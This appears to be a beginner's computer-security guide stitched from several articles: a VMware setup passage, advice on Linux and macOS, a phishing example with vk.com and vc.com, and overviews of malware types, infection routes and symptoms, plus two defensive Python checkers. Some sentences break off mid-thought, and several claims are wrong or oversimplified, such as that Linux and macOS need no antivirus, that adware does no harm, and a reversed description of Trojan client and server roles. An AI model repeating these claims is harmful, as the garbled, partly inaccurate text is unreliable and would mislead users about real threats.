In general, if your computer is weak, it's easier not to bother with virtual machines.

You will return to the window with information about setting up your virtual machine and it's time to proceed directly to installing the virtual machine!

Check that the "Power on this virtual machine after creation" checkbox is checked so that the installation starts immediately and click "Finish":

The installation of the virtual OS you configured will start. First, windows will appear notifying you that some of your real computer hardware is connected to the virtual machine, as well as windows with various non-essential information. Just check the box "Do not show this hint again" in these windows and click "OK":

Then the installation of the virtual OS itself will begin. Using Windows XP as the example, it looks like this:

Installing a system as a virtual machine does not differ from the actual process of installing this system on a computer.

After installing the operating system as a virtual one, it will start immediately. It all looks something like this (i.e. the operating system in the VMWare program window):

Immediately after the system starts, the installation of additional tools will begin in it automatically. This is necessary primarily so that you can easily drag and drop files from the real system into the virtual OS window or vice versa, and also freely resize the window with the virtual machine.

Important nuances for working with virtual machines


Option number 3. Use for work (permanently) one of the operating systems Linux or MacOS

In addition to the most popular Windows operating systems in the world, there are analogues. The most popular analogues are Linux and MacOS systems.

Linux is a free operating system that anyone can freely download from the Internet and install on their computer.

MacOS is the factory operating system on all Apple computers (Macbook).

One very important feature unites both of these systems - they are much safer than the usual Windows. That is why I attributed the work in these systems to the 3rd option for safe work on a computer.

Working on Linux or MacOS, you don't even have to use antiviruses! There is definitely a risk of infection, but it is minimal compared to Windows, especially since the vast majority of various viruses, trojans and other threats are developed for Windows computers, and if these files get on Linux or MacOS, they will simply be harmless.

Should I switch to Linux or stay on Windows?

It's up to you to decide! But I can say that these are fundamentally different systems, similar to Windows only in some features and nothing more. They have a completely different interface; a lot of other programs that are not in Windows and are in these systems (and vice versa); for some programs you will have to look for analogues (for example, for Linux there is no Adobe Photoshop); in general, they are completely different in structure of the system.

Therefore, if you are a beginner who is not yet on familiar terms with a computer but has already adapted to working in Windows, a full transition to Linux or MacOS can be a real problem for you. Even for experienced users who have worked only on Windows for many years, the transition to Linux will by no means go without complications, a lot of questions and misunderstanding of some things.

In this case, it is probably easier for you to work on Windows, applying the security measures described in this manual. Moreover, Linux and MacOS will not be fully protected against theft of personal data, such as passwords from sites, bank card and account data, even taking into account their security from virus threats.

This is because users themselves are to blame for the theft of data, through inexperience and inattention: it is enough to accidentally open a fake site and enter a login and password there (thinking that you are entering the familiar site you need), and that's it, the attackers have the data! This is just one example of how data can be stolen due to user carelessness.

Reminder! We must not forget

It is important to know that no matter what means of protection you use when working on a computer to protect yourself from viruses that break the system and personal data, from theft of important data, from hacking and everything else, you will not be able to ensure 100% safe browsing on the Internet, if you put yourself at risk on your own, due to inexperience, ignorance, inattention.

The simplest example. Someone on the Internet asked you to send them the password to your e-mail, and you, trusting the person, send it. Then this person does with your mail as he pleases, whether he wants to delete all your letters or do nasty things on your behalf. What will the protection that you use to work on the Internet do in this case? Nothing at all!

Whether it's the most advanced antivirus, a virtual machine, or working in a secure Linux system or another system. All this will not help in any way, because in this case you yourself transferred your data to the attacker and this happens all the time, as a rule, due to excessive trust, due to inexperience and inattention of users.

I will give an example of user inattention, which leads to the theft of personal data.

Suppose you want to log in to your account on the social network VKontakte. You seem to go to the site of this social network as usual, but you don't even notice that the address of the site is slightly different from the real one.

The original address of this social network is vk.com, and you got to the site vc.com, which, for example, has exactly the same design as the VKontakte site.

So, by going to this fake, fraudulent site, you pay no attention to anything, enter your username and password to enter your account. And then oops! Your data, namely your login and password, will already be in the hands of attackers! And all why? Simple inattention, probably inexperience. In this case, again, no means of protection will help. Antivirus, of course, can warn about a phishing site, but not always, because this fake site could have appeared the other day and simply did not get into the database yet.

And there are many such examples...
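The vk.com / vc.com mix-up described above can also be checked mechanically, before any antivirus database knows about the fake site. The following is an added example, not part of the original article: it compares a hostname with a short list of sites you actually log in to and flags near misses. The trusted list, the function names and the "last two labels" shortcut are assumptions made for illustration.

```python
# Assumption: a small allowlist of sites the user really logs in to.
TRUSTED = {"vk.com", "mail.ru", "yandex.ru"}


def osa_distance(a, b):
    """Edit distance counting insert, delete, substitute and adjacent swap."""
    prev2 = None
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cost = 0 if ca == cb else 1
            val = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost)
            # adjacent transposition, e.g. "kv" typed instead of "vk"
            if prev2 is not None and j > 1 and ca == b[j - 2] and a[i - 2] == cb:
                val = min(val, prev2[j - 2] + 1)
            cur.append(val)
        prev2, prev = prev, cur
    return prev[-1]


def registrable(host):
    # Simplification (assumption): the last two labels are the site's domain.
    # A real tool would consult the Public Suffix List instead.
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def classify(host, trusted=TRUSTED, max_distance=1):
    """Return (verdict, matched trusted domain or None) for a hostname."""
    host = host.lower().rstrip(".")
    domain = registrable(host)
    if domain in trusted:
        return ("trusted", domain)
    # Non-ASCII or punycode labels can hide letters that only look Latin.
    if not host.isascii() or any(l.startswith("xn--") for l in host.split(".")):
        return ("suspicious-idn", None)
    for good in sorted(trusted):
        # Trusted name used as a subdomain of another site: vk.com.login.example
        if host.startswith(good + ".") or ("." + good + ".") in host:
            return ("lookalike", good)
        # One typo away from a trusted name: vc.com, kv.com
        if osa_distance(domain, good) <= max_distance:
            return ("lookalike", good)
    return ("unknown", None)


if __name__ == "__main__":
    # Constructed sample hostnames, including the pair from the article.
    for h in ("vk.com", "vc.com", "kv.com", "vk.com.login.example", "example.org"):
        print(h, classify(h))
```

A "lookalike" verdict is a prompt to stop and read the address bar, not proof of fraud: with short names, a legitimate site can also sit one letter away from a trusted one.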

Therefore, when browsing the Internet, always be on the lookout, attentive and careful. Here are some recommendations.

In fact, treating viruses is not so complicated an operation that you need to pay specialists a lot of money for it. You can protect your computer from viruses yourself or, in case of infection, return the computer to a "healthy" state by removing the malware, by choosing a good antivirus program and following some rules. Take at least the two most important ones. First, regularly update the antivirus databases. Second, completely scan your computer for viruses once a month.

So, with this, I think it is clear that malware removal is carried out with the help of antiviruses. They come in paid and free versions. I talked about free methods in the following article:

And now, what is a malicious program, or in other words a virus?

A computer virus, or malware, is a program whose main purpose is harming a computer, damaging user data, stealing or deleting personal information, degrading computer performance, and much more.

Today, malware can be classified into several types according to its impact on the computer.

  • Classic viruses.
  • Trojan programs.
  • Spies.
  • Rootkits.
  • Adware.

Let's take a closer look at each type of malware.

Classic viruses are malicious programs that can infect a computer, for example, via the Internet. And the essence of such viruses lies in self-replication. Such viruses copy themselves, copy files and folders that are on the infected computer. They do this in order to infect the data so that in the future their recovery would be impossible. This virus tries to damage all data on the computer by putting its code into all files, from system files to the user's personal data. Most often, salvation, on such an infected computer, is.

Trojan is a serious type of virus. Trojans are written by attackers for a specific purpose, for example, stealing information from computers, or stealing passwords, and so on.

The Trojan is divided into two parts. The first part, called the Server, is kept by the attacker, and the second, the Client part, is distributed to all possible corners of the Internet and to other places. If the client part of the malicious program gets onto a computer, then this PC becomes infected and the Trojan begins covertly sending various information to the attacker's server.

Also, the Trojan can perform various operations on the computer at the request of the server (intruder), steal passwords, infect documents and files with malicious code.

Spies are somewhat similar to Trojans. Their main difference is that spies do not harm the system or user files. Spyware quietly settles on the computer and spies. It can steal passwords or even record absolutely everything that you type on the keyboard.

Spyware is the most intelligent type of virus and can even send files from an infected computer. The spy knows a lot of information about the infected PC: what system is installed, what antivirus you use, what browser you use on the Internet, what programs are installed on the computer, and so on. Spyware is one of the most dangerous malware.

Rootkits are not viruses in and of themselves. They are programs whose purpose is to hide the existence of other viruses on the computer. For example, a computer was infected with a spy virus at the same time as a rootkit. The rootkit will try to hide the spy from your antivirus and operating system. Accordingly, the presence of rootkits on a computer is no less dangerous, since they can work quite well and hide a bunch of viruses (spyware, Trojans) from the eyes of our antivirus for a long time!

Adware is another type of malware. This is a less dangerous program, and its essence is to show ads on your computer in every possible way and in various places. Adware does not cause any harm and does not infect or corrupt files. But you also need to protect yourself from this type of virus.

These are the types of malware that exist. To protect your computer from viruses, we need a good antivirus. I talked about that in another article, and now we will continue the topic of describing viruses and protection schemes for our computer.

Previously, viruses did not have any specific purpose; they were written out of interest, and the developer did not set a specific goal. Now viruses are highly complex algorithms whose essence is most often the theft of money and data. Trojans are most often designed only to steal passwords and other important data.

By the way, whether your computer was attacked by viruses can be distinguished by some signs:

  • Programs do not work properly or stop working altogether.
  • The computer began to slow down, work slowly.
  • Some files get corrupted, refuse to open.

Very often these symptoms are a sign of a computer virus infection, but fortunately not always.

It should be noted that most often one particular virus can infect different types of files. Therefore, even after curing the computer of a strong virus attack, formatting the partition will be the most correct course.

As I said above, antivirus programs will help you protect yourself from viruses. Today, antivirus programs have enough features to repel almost all malicious programs that are distributed on the Internet. But for maximum virus protection, a properly selected and configured antivirus program plays an important role in full "combat" performance. I recommend that you read the article about. But if you do not have time, then I will name the best antivirus programs right here. As of today, these are:

  • Kaspersky
  • Avast
  • Dr. Web
  • NOD32

I think there are plenty to choose from.

Good luck and excellent virus protection to you.

Hello again.
The topic of today's article: types of computer viruses, the principles of their work, and the ways computers get infected with them.

What are computer viruses anyway.

A computer virus is a specially written program or assembly of algorithms that is written for the purpose of: making a joke, harming someone's computer, gaining access to your computer, intercepting passwords or extorting money. Viruses can self-copy and infect your programs and files with malicious code, as well as boot sectors.

Types of malware.

Malicious programs can be divided into two main types.
Viruses and worms.


Viruses spread through a malicious file, which you could download on the Internet, or which may turn up on a pirated disk; they are also often passed around via Skype under the guise of useful programs (I noticed that schoolchildren often come across the latter: they are allegedly given a mod for a game or cheats, but in fact it may turn out to be a virus that can do harm).
The virus introduces its code into one of the programs, or disguises itself as a separate program in a place where users usually do not go (folders with the operating system, hidden system folders).
The virus cannot start itself unless you run the infected program yourself.
Worms, by contrast, infect a lot of files on your computer, for example all .exe files, system files, boot sectors, etc.
Worms most often penetrate the system on their own, using vulnerabilities in your OS, your browser, or a certain program.
They can penetrate through chats and communication programs such as Skype and ICQ, and can be distributed via e-mail.
They can also be on websites and use a vulnerability in your browser to penetrate your system.
Worms can spread over a local network: if one of the computers on the network is infected, the worm can spread to other computers, infecting all files in its path.
Worms are usually written for the most popular programs. For example, now the most popular browser is Chrome, so scammers will try to write for it and place malicious code for it on websites. It is often more interesting to infect thousands of users who use a popular program than a hundred with an unpopular program. Although Chrome is constantly improving its protection.
The best protection against network worms is to update your programs and your operating system. Many neglect updates, which they often regret.
A few years ago, I noticed the following worm.

But it obviously did not get in through the Internet, but most likely through a pirated disk. The essence of its work was as follows: it created, as it were, a copy of each folder on a computer or on a flash drive. But in fact, it created not a similar folder, but an exe file. When you clicked on such an exe file, it spread even more throughout the system. And as soon as you got rid of it, you would go to a friend with a flash drive, copy music from him, and return with a flash drive infected with such a worm, and again you had to remove it. Whether this virus caused any other harm to the system, I do not know, but soon this virus ceased to exist.
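The behaviour described above (an .exe file appearing next to each folder under the folder's name) leaves a pattern that can be searched for on a flash drive before anything is clicked. The sketch below is an added example, not code from the original article. It assumes that the worm's copies are byte-identical and carry the names of sibling folders; the function names and the sample tree are constructed for illustration.

```python
import hashlib
import os
import tempfile


def sha256_of(path, chunk=1 << 16):
    """Hash a file in chunks so large executables do not fill memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def find_folder_impostors(root):
    """Return {sha256: [paths]} for identical .exe files named after sibling folders."""
    by_hash = {}
    for dirpath, dirnames, filenames in os.walk(root):
        folder_names = {d.lower() for d in dirnames}
        for name in filenames:
            stem, ext = os.path.splitext(name)
            # Only an .exe whose name repeats a folder in the same directory counts.
            if ext.lower() != ".exe" or stem.lower() not in folder_names:
                continue
            path = os.path.join(dirpath, name)
            by_hash.setdefault(sha256_of(path), []).append(path)
    # One binary posing as several different folders is the strong signal;
    # a single Tools.exe next to Tools/ may be perfectly legitimate.
    return {h: sorted(p) for h, p in by_hash.items() if len(p) >= 2}


def demo():
    """Build a constructed sample tree and return the flagged file names."""
    with tempfile.TemporaryDirectory() as root:
        for folder in ("Music", "Photos", "Tools"):
            os.mkdir(os.path.join(root, folder))
        samples = {  # constructed contents, not real executables
            "Music.exe": b"CONSTRUCTED-DUPLICATE",
            "Photos.exe": b"CONSTRUCTED-DUPLICATE",
            "Tools.exe": b"CONSTRUCTED-UNIQUE",
            os.path.join("Tools", "setup.exe"): b"CONSTRUCTED-INSTALLER",
        }
        for rel, data in samples.items():
            with open(os.path.join(root, rel), "wb") as f:
                f.write(data)
        clusters = find_folder_impostors(root)
        return sorted(os.path.basename(p) for ps in clusters.values() for p in ps)


if __name__ == "__main__":
    print(demo())
```

On a real drive, call `find_folder_impostors` with the drive's root path and hand any flagged files to an antivirus scan instead of opening them.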

The main types of viruses

In fact, there are many types and varieties of computer threats, and it is impossible to cover them all. Therefore, we will consider the most common ones of recent times and the most unpleasant.
Viruses are:
- File viruses - located in an infected file and activated when the user starts this program; they cannot activate themselves.
- Boot viruses - can be loaded at Windows startup by getting into autoload, when a flash drive is inserted, or the like.
- Macro viruses - various scripts that may be on a website, or may be sent to you by mail or in Word and Excel documents; they perform certain functions built into the computer and exploit vulnerabilities in your programs.

Types of viruses.
- Trojans
- Spies
- Ransomware
- Vandals
- Rootkits
- Botnet
- Keyloggers
These are the most basic types of threats that you may encounter. But in reality there are many more.
Some viruses can even be combined and contain several types of these threats at once.
- Trojans. The name comes from the Trojan horse. A Trojan penetrates your computer under the guise of a harmless program; it can then open access to your computer or send your passwords to its owner.
Lately, Trojans called stealers have become widespread. They can steal passwords saved in your browser, in games and in mail clients. Immediately after launch, a stealer copies your passwords and sends them to the attacker's e-mail or hosting. It remains for the attacker to collect your data, which is then either sold or used for his own purposes.
- Spies (spyware) track user actions: what sites the user visits or what the user does on the computer.
- Ransomware. These include Winlockers. The program completely blocks access to the computer and demands money for unlocking, for example by a transfer to an account. In no case should you send money if you fall for this. The computer will not be unlocked for you, and you will lose money. Go straight to the Dr. Web website, where you can find how to unlock many winlockers by entering a specific code or performing some actions. Some winlockers can disappear on their own, for example after a day.
- Vandals can block access to antivirus websites and access to antivirus and many other programs.
- Rootkits are hybrid viruses. They may contain various viruses. They can get access to your PC, giving a person full access to your computer, and they can embed themselves at the kernel level of your OS. They came from the world of Unix systems. They can mask various viruses and collect data about the computer and about all computer processes.
- Botnets are quite a nasty thing. Botnets are huge networks of infected "zombie" computers that can be used to DDoS websites and carry out other cyber attacks using the infected computers. This type is very common and hard to detect; even antivirus companies may not know about their existence for a long time. A lot of people can be infected with them and not even suspect it. You are no exception, and maybe even me.
- Keyloggers intercept everything that you enter from the keyboard (websites, passwords) and send it to the owner.

Ways of infection with computer viruses.

Main routes of infection:
- Vulnerability of the operating system.
- Vulnerability in the browser.
- Poor quality of the antivirus.
- User stupidity.
- Removable media.

OS vulnerability - no matter how hard developers try to build protection into the OS, security holes are found over time. Most viruses are written for Windows, as it is the most popular operating system. The best defense is to keep your operating system up to date and try to use the newest version.
Browsers - infection happens due to browser vulnerabilities, especially if the browser is old. The cure is the same: frequent updates. There may also be problems if you download browser plugins from third-party resources.
Antivirus - free antiviruses have less functionality than paid ones. Although the paid ones do not give a 100% result in defense either and sometimes misfire. But it is desirable to have at least a free antivirus. I already wrote about free antiviruses in this.
User stupidity - clicking on banners, following suspicious links from emails, installing software from suspicious places, etc.
Removable media - viruses can be installed automatically from infected and specially prepared flash drives and other removable media. Not so long ago, the world heard about the BadUSB vulnerability.


Types of infected objects.

Files - viruses infect your programs, system files and regular files.
Boot sectors - resident viruses. As the name implies, they infect the boot sectors of the computer, add their code to the computer's autoload and run when the operating system starts. Sometimes they are well disguised and difficult to remove from startup.
Macros - Word documents, Excel documents and the like. Using macros and vulnerabilities in Microsoft Office tools, the virus introduces its malicious code into your operating system.

Signs of a computer virus infection.

The appearance of some of these signs does not necessarily mean there is a virus in the system. But if they are present, it is recommended to check your computer with an antivirus or contact a specialist.
One of the common symptoms is a heavy load on the computer: it runs slowly although you don't seem to have anything running that could load it heavily. But if you have an antivirus, note that antiviruses themselves load the computer quite heavily. If there is no such software that could load it, then viruses are more likely. In general, I advise you to start by reducing the number of programs in autorun.

It can also be one of the signs of infection.
But not all viruses load the system heavily; with some, it is hard to notice any changes.
System errors. Drivers stop working, and some programs start to work incorrectly or often crash with an error, although this had not been noticed before. Or programs start to reboot frequently. Of course, this can also happen because of an antivirus: for example, it deleted a system file by mistake, considering it malicious, or deleted a really infected file that was tied to a program's system files, and the removal caused such errors.


Ads appear in browsers, or banners even start appearing on the desktop.
Non-standard sounds appear when the computer is running (squeaks, clicks for no reason, and the like).
The CD/DVD drive opens by itself, or just starts to read a disc although no disc is there.
The computer takes a long time to turn on or off.
Hijacking of your passwords. If you notice that various spam is being sent on your behalf, from your mailbox or social network page, it is possible that a virus has entered your computer and transferred your passwords to its owner. If you notice this, I recommend that you check with an antivirus without fail (although it is not a fact that this is exactly how the attacker got your password).
Frequent hard disk access. Every computer has an indicator that blinks when you use various programs or when you copy, download or move files. For example, your computer has just been turned on and no programs are being used, but the indicator starts blinking frequently, as if programs were being used. These are already viruses at the hard disk level.

That, in fact, covers the computer viruses that you can meet on the Internet. But in reality there are many times more of them, and it is not possible to fully protect yourself, unless you do not use the Internet, do not buy disks, and do not turn on the computer at all.

